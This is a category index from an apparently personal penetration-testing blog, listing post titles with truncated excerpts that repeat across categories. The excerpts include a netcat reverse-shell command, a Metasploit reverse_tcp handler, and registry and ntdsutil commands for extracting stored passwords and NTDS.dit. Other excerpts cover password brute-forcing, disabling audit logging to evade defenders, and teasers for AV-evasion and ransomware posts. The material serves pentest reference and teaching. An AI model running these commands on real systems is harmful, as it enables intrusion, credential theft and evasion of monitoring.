HiveJack
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
Posts by Category
- Internal Pentest 31
- Internal Infrastructure Pentest 29
- Network Pentest 29
- Active Directory Hacking 10
- Security Automation 5
- ATM Hacking 4
- Kiosk Hacking 4
- Threat Intelligence 3
- Hardware Hacking 2
- LOTL 2
- EDR 2
- Offnesive Security 2
- Web Application Testing 1
- WebApp Security 1
- SDR 1
- Radio Frequency 1
- USB Forensics 1
- Forensics 1
- USB Drops 1
- Ransomware 1
- Malware 1
- Emerging Threats 1
- Web Application Pentest 1
- CVE 1
- OSINT 1
- Reconnaissance 1
- DevOps 1
- DevSecOps 1
- Red Team 1
- AV Bypass 1
- Security 1
- Kali 1
- Cloud Security 1
Internal Pentest
Living Off The Land Binaries - AT Command
Examples of at.exe being used maliciously in order to establish persistence in a manner almost identical to schtasks use as a lolbin (enter hashes into viru...
Internal Infrastructure Pentest - Socks Tunnel
SOCKS 5 proxy tunnel:
Internal Infrastructure Pentest - metasploit gpp
msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER test SMBUSER => test msf auxiliary(smb_enum_gpp) > set S...
Internal Infrastructure Pentest - msfvenom
Handler on Msfconsole - use exploit/multi/handler - set PAYLOAD windows/meterpreter/reverse_tcp - set LHOST localhost - set LPORT 4444 - set Exi...
Internal Infrastructure Pentest - User Management Kali
adduser user1 passwd user1 type new password: xxxxxxxxxxxxxxx type confirm password: xxxxxxxxxxxx Adding user to the sudoers ...
Internal Infrastructure Pentest - Unencrypted HDD Boot
- Boot the machine with Kali - fdisk -l - look for (HPFS/NTFS/exFat) in the Type column of the about command - mkdir /mnt/nts - mount -t -ntfs-3g /dev/sda1 ...
Internal Infrastructure Pentest - UAC Bypass
• Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html • Malicious Application Compatibility Shims, https://www.blackhat.co...
Internal Infrastructure Pentest - Responder
Responder.py -i local-ip -I interface
Internal Infrastructure Pentest - Procdump
Download Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Internal Infrastructure Pentest - Nmap Ping Sweep
Ping sweep is the process of pinging an entire range of network ip addresses to find out which ones are online or alive. Nmap is an excellent tool to do t...
Internal Infrastructure Pentest - Nessus Installation
- sudo wget http://downloads.nessus.org/nessus3dl.php?file=Nessus-6.11.1-debian6_amd64.deb - sudo dpkg -i Nessus-6.11.1-debian6_amd64.deb - Incase you hav...
Internal Infrastructure Pentest - Kerberoasting
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
Internal Infrastructure Pentest - Repos For Internal Pentest
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
Internal Infrastructure Pentest - Hydra
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Internal Infrastructure Pentest - Netcat
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
Internal Infrastructure Pentest - Enable RDP and Remote Assistance on A Remote Machine
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
Internal Infrastructure Pentest - Extracting Juicy Information from Registry
reg query “HKCU\Software\ORL\WinVNC3\Password” reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query “HKCU\Software\SimonTatham\...
Internal Infrastructure Pentest - Skeleton Key Attack
Skeleton Key Attack: This attack is very tricky. It makes the secondary password for the same user. Many malware takes advantage of this attack to create ...
Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Internal Infrastructure Pentest - Password Spraying With CMD
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Internal Infrastructure Pentest - LLMNR
LLMNR (Link Local Multicast Name Rsolution): The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet f...
Internal Infrastructure Pentest - DumpSec
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Clear text proxy credentials of putty: reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” This lists out all available sessions with pu...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
Internal Infrastructure Pentest - Remote PsExec
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Internal Infrastructure Pentest - Null Session
Active Reconnaissance Methods: Null Session: net use \[DA IP Address]\ipc$ “” “/user:” here we’re trying to connec...
Internal Infrastructure Pentest - List of Commands
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Internal Infrastructure Pentest - Disable Security Policies and Services
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
Internal Infrastructure Pentest
Internal Infrastructure Pentest - Socks Tunnel
SOCKS 5 proxy tunnel:
Internal Infrastructure Pentest - metasploit gpp
msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER test SMBUSER => test msf auxiliary(smb_enum_gpp) > set S...
Internal Infrastructure Pentest - msfvenom
Handler on Msfconsole - use exploit/multi/handler - set PAYLOAD windows/meterpreter/reverse_tcp - set LHOST localhost - set LPORT 4444 - set Exi...
Internal Infrastructure Pentest - User Management Kali
adduser user1 passwd user1 type new password: xxxxxxxxxxxxxxx type confirm password: xxxxxxxxxxxx Adding user to the sudoers ...
Internal Infrastructure Pentest - Unencrypted HDD Boot
- Boot the machine with Kali - fdisk -l - look for (HPFS/NTFS/exFat) in the Type column of the about command - mkdir /mnt/nts - mount -t -ntfs-3g /dev/sda1 ...
Internal Infrastructure Pentest - UAC Bypass
• Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html • Malicious Application Compatibility Shims, https://www.blackhat.co...
Internal Infrastructure Pentest - Responder
Responder.py -i local-ip -I interface
Internal Infrastructure Pentest - Procdump
Download Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Internal Infrastructure Pentest - Nmap Ping Sweep
Ping sweep is the process of pinging an entire range of network ip addresses to find out which ones are online or alive. Nmap is an excellent tool to do t...
Internal Infrastructure Pentest - Nessus Installation
- sudo wget http://downloads.nessus.org/nessus3dl.php?file=Nessus-6.11.1-debian6_amd64.deb - sudo dpkg -i Nessus-6.11.1-debian6_amd64.deb - Incase you hav...
Internal Infrastructure Pentest - Kerberoasting
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
Internal Infrastructure Pentest - Repos For Internal Pentest
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
Internal Infrastructure Pentest - Hydra
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Internal Infrastructure Pentest - Netcat
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
Internal Infrastructure Pentest - Enable RDP and Remote Assistance on A Remote Machine
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
Internal Infrastructure Pentest - Extracting Juicy Information from Registry
reg query “HKCU\Software\ORL\WinVNC3\Password” reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query “HKCU\Software\SimonTatham\...
Internal Infrastructure Pentest - Skeleton Key Attack
Skeleton Key Attack: This attack is very tricky. It makes the secondary password for the same user. Many malware takes advantage of this attack to create ...
Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Internal Infrastructure Pentest - Password Spraying With CMD
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Internal Infrastructure Pentest - LLMNR
LLMNR (Link Local Multicast Name Rsolution): The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet f...
Internal Infrastructure Pentest - DumpSec
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Clear text proxy credentials of putty: reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” This lists out all available sessions with pu...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
Internal Infrastructure Pentest - Remote PsExec
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Internal Infrastructure Pentest - Null Session
Active Reconnaissance Methods: Null Session: net use \[DA IP Address]\ipc$ “” “/user:” here we’re trying to connec...
Internal Infrastructure Pentest - List of Commands
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Internal Infrastructure Pentest - Disable Security Policies and Services
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
Network Pentest
Internal Infrastructure Pentest - Socks Tunnel
SOCKS 5 proxy tunnel:
Internal Infrastructure Pentest - metasploit gpp
msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER test SMBUSER => test msf auxiliary(smb_enum_gpp) > set S...
Internal Infrastructure Pentest - msfvenom
Handler on Msfconsole - use exploit/multi/handler - set PAYLOAD windows/meterpreter/reverse_tcp - set LHOST localhost - set LPORT 4444 - set Exi...
Internal Infrastructure Pentest - User Management Kali
adduser user1 passwd user1 type new password: xxxxxxxxxxxxxxx type confirm password: xxxxxxxxxxxx Adding user to the sudoers ...
Internal Infrastructure Pentest - Unencrypted HDD Boot
- Boot the machine with Kali - fdisk -l - look for (HPFS/NTFS/exFat) in the Type column of the about command - mkdir /mnt/nts - mount -t -ntfs-3g /dev/sda1 ...
Internal Infrastructure Pentest - UAC Bypass
• Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html • Malicious Application Compatibility Shims, https://www.blackhat.co...
Internal Infrastructure Pentest - Responder
Responder.py -i local-ip -I interface
Internal Infrastructure Pentest - Procdump
Download Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Internal Infrastructure Pentest - Nmap Ping Sweep
Ping sweep is the process of pinging an entire range of network ip addresses to find out which ones are online or alive. Nmap is an excellent tool to do t...
Internal Infrastructure Pentest - Nessus Installation
- sudo wget http://downloads.nessus.org/nessus3dl.php?file=Nessus-6.11.1-debian6_amd64.deb - sudo dpkg -i Nessus-6.11.1-debian6_amd64.deb - Incase you hav...
Internal Infrastructure Pentest - Kerberoasting
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
Internal Infrastructure Pentest - Repos For Internal Pentest
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
Internal Infrastructure Pentest - Hydra
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Internal Infrastructure Pentest - Netcat
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
Internal Infrastructure Pentest - Enable RDP and Remote Assistance on A Remote Machine
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
Internal Infrastructure Pentest - Extracting Juicy Information from Registry
reg query “HKCU\Software\ORL\WinVNC3\Password” reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query “HKCU\Software\SimonTatham\...
Internal Infrastructure Pentest - Skeleton Key Attack
Skeleton Key Attack: This attack is very tricky. It makes the secondary password for the same user. Many malware takes advantage of this attack to create ...
Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Internal Infrastructure Pentest - Password Spraying With CMD
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Internal Infrastructure Pentest - LLMNR
LLMNR (Link Local Multicast Name Rsolution): The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet f...
Internal Infrastructure Pentest - DumpSec
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Clear text proxy credentials of putty: reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” This lists out all available sessions with pu...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
Internal Infrastructure Pentest - Remote PsExec
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Internal Infrastructure Pentest - Null Session
Active Reconnaissance Methods: Null Session: net use \[DA IP Address]\ipc$ “” “/user:” here we’re trying to connec...
Internal Infrastructure Pentest - List of Commands
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Internal Infrastructure Pentest - Disable Security Policies and Services
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
Active Directory Hacking
Internal Infrastructure Pentest - Socks Tunnel
SOCKS 5 proxy tunnel:
Internal Infrastructure Pentest - metasploit gpp
msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER test SMBUSER => test msf auxiliary(smb_enum_gpp) > set S...
Internal Infrastructure Pentest - msfvenom
Handler on Msfconsole - use exploit/multi/handler - set PAYLOAD windows/meterpreter/reverse_tcp - set LHOST localhost - set LPORT 4444 - set Exi...
Internal Infrastructure Pentest - User Management Kali
adduser user1 passwd user1 type new password: xxxxxxxxxxxxxxx type confirm password: xxxxxxxxxxxx Adding user to the sudoers ...
Internal Infrastructure Pentest - Unencrypted HDD Boot
- Boot the machine with Kali - fdisk -l - look for (HPFS/NTFS/exFat) in the Type column of the about command - mkdir /mnt/nts - mount -t -ntfs-3g /dev/sda1 ...
Internal Infrastructure Pentest - UAC Bypass
• Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html • Malicious Application Compatibility Shims, https://www.blackhat.co...
Internal Infrastructure Pentest - Responder
Responder.py -i local-ip -I interface
Internal Infrastructure Pentest - Procdump
Download Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Internal Infrastructure Pentest - Nmap Ping Sweep
Ping sweep is the process of pinging an entire range of network ip addresses to find out which ones are online or alive. Nmap is an excellent tool to do t...
Internal Infrastructure Pentest - Nessus Installation
- sudo wget http://downloads.nessus.org/nessus3dl.php?file=Nessus-6.11.1-debian6_amd64.deb - sudo dpkg -i Nessus-6.11.1-debian6_amd64.deb - Incase you hav...
Security Automation
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
The Power of In-Memory Executions: How to Execute Code without Touching Disk
In-memory execution is a technique used by malware developers to evade detection by traditional antivirus solutions. Instead of writing their malicious code ...
Understanding DevSecOps Security Test Pyramid
Happy New Year, readers!
Threat Investigation Canvas
Over the last few days, I observed targeted campaigns against Microsoft brand. With multiple feed sources, found 447 unique malicious domains.
ATM Hacking
ATM/Kiosk Machine Hacking - Shortcuts to Breakout of the Screen
ALT+F4: Quit program ALT+SPACE: System Menu ALT+TAB: Switch between open programs CTRL+ALT+DEL: Task Manager or Windows Security Screen CTRL+B: Op...
ATM/Kiosk Machine Hacking - Folder Path Alternatives
%USERPROFILE% %PROGRAMDATA% %PUBLIC% %TMP% %WINDIR% %SYSTEMDRIVE% %SYSTEMROOT%
ATM/Kiosk Machine Hacking - Captive Portal Breakout
Visit http://ikat.ha.cked.net/ from the Browser
ATM/Kiosk Machine Hacking - Shell Protocols
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} Shell:Profile Shell:ProgramFiles Shell:System Shell:Control...
Kiosk Hacking
ATM/Kiosk Machine Hacking - Shortcuts to Breakout of the Screen
ALT+F4: Quit program ALT+SPACE: System Menu ALT+TAB: Switch between open programs CTRL+ALT+DEL: Task Manager or Windows Security Screen CTRL+B: Op...
ATM/Kiosk Machine Hacking - Folder Path Alternatives
%USERPROFILE% %PROGRAMDATA% %PUBLIC% %TMP% %WINDIR% %SYSTEMDRIVE% %SYSTEMROOT%
ATM/Kiosk Machine Hacking - Captive Portal Breakout
Visit http://ikat.ha.cked.net/ from the Browser
ATM/Kiosk Machine Hacking - Shell Protocols
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} Shell:Profile Shell:ProgramFiles Shell:System Shell:Control...
Threat Intelligence
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
Threat Investigation Canvas
Over the last few days, I observed targeted campaigns against Microsoft brand. With multiple feed sources, found 447 unique malicious domains.
Hardware Hacking
Hardware Hacking - Dropbox for Pentesting
Command & Control Server:
Hardware Hacking - Information Gathering
https://www.fcc.gov/oet/ea/fccid
LOTL
HiveJack
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
Living Off The Land Binaries - AT Command
Examples of at.exe being used maliciously in order to establish persistence in a manner almost identical to schtasks use as a lolbin (enter hashes into viru...
EDR
HiveJack
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
Living Off The Land Binaries - AT Command
Examples of at.exe being used maliciously in order to establish persistence in a manner almost identical to schtasks use as a lolbin (enter hashes into viru...
Offnesive Security
Installing Kali in AWS EC2 Instance
sudo passwd kali sudo apt-get update sudo apt-get install xrdp lxde-core lxde tigervnc-standalone-server -y cd / sudo sed -i ‘s/allowed_users=.*/a...
Web Application Testing
Web Application Pentest - HTML-to-PDF-Converter
Below are some of the vulnerability reports in the HTML to PDF converters or PDF parsers.
WebApp Security
Web Application Pentest - HTML-to-PDF-Converter
Below are some of the vulnerability reports in the HTML to PDF converters or PDF parsers.
SDR
IMSI Catcher
Thanks to Keld Norman
Radio Frequency
IMSI Catcher
Thanks to Keld Norman
USB Forensics
Restore Lost Capacity Of Your USB Drives and SD Cards
I was playing with the Pi hole on one of my old Raspberry Pi and noticed that my 32 GB SanDisk Micro SD card was showing only 100 MB as space. I tried multip...
Forensics
Restore Lost Capacity Of Your USB Drives and SD Cards
I was playing with the Pi hole on one of my old Raspberry Pi and noticed that my 32 GB SanDisk Micro SD card was showing only 100 MB as space. I tried multip...
USB Drops
Restore Lost Capacity Of Your USB Drives and SD Cards
I was playing with the Pi hole on one of my old Raspberry Pi and noticed that my 32 GB SanDisk Micro SD card was showing only 100 MB as space. I tried multip...
Ransomware
Phirautee- Writing Ransomware using Living off the Land (LotL) Tactics
Phirautee A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShel...
Malware
Phirautee- Writing Ransomware using Living off the Land (LotL) Tactics
Phirautee A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShel...
Emerging Threats
Phirautee- Writing Ransomware using Living off the Land (LotL) Tactics
Phirautee A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShel...
Web Application Pentest
Nette Framework: CVE-2020-15227
Nette Framework: Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusabil...
CVE
Nette Framework: CVE-2020-15227
Nette Framework: Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusabil...
OSINT
BigBountyRecon - Reconnaissance Tool
BigBountyRecon BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial recon...
Reconnaissance
BigBountyRecon - Reconnaissance Tool
BigBountyRecon BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial recon...
DevOps
Understanding DevSecOps Security Test Pyramid
Happy New Year, readers!
DevSecOps
Understanding DevSecOps Security Test Pyramid
Happy New Year, readers!
Red Team
The Power of In-Memory Executions: How to Execute Code without Touching Disk
In-memory execution is a technique used by malware developers to evade detection by traditional antivirus solutions. Instead of writing their malicious code ...
AV Bypass
The Power of In-Memory Executions: How to Execute Code without Touching Disk
In-memory execution is a technique used by malware developers to evade detection by traditional antivirus solutions. Instead of writing their malicious code ...
Security
Installing Kali in AWS EC2 Instance
sudo passwd kali sudo apt-get update sudo apt-get install xrdp lxde-core lxde tigervnc-standalone-server -y cd / sudo sed -i ‘s/allowed_users=.*/a...
Kali
Installing Kali in AWS EC2 Instance
sudo passwd kali sudo apt-get update sudo apt-get install xrdp lxde-core lxde tigervnc-standalone-server -y cd / sudo sed -i ‘s/allowed_users=.*/a...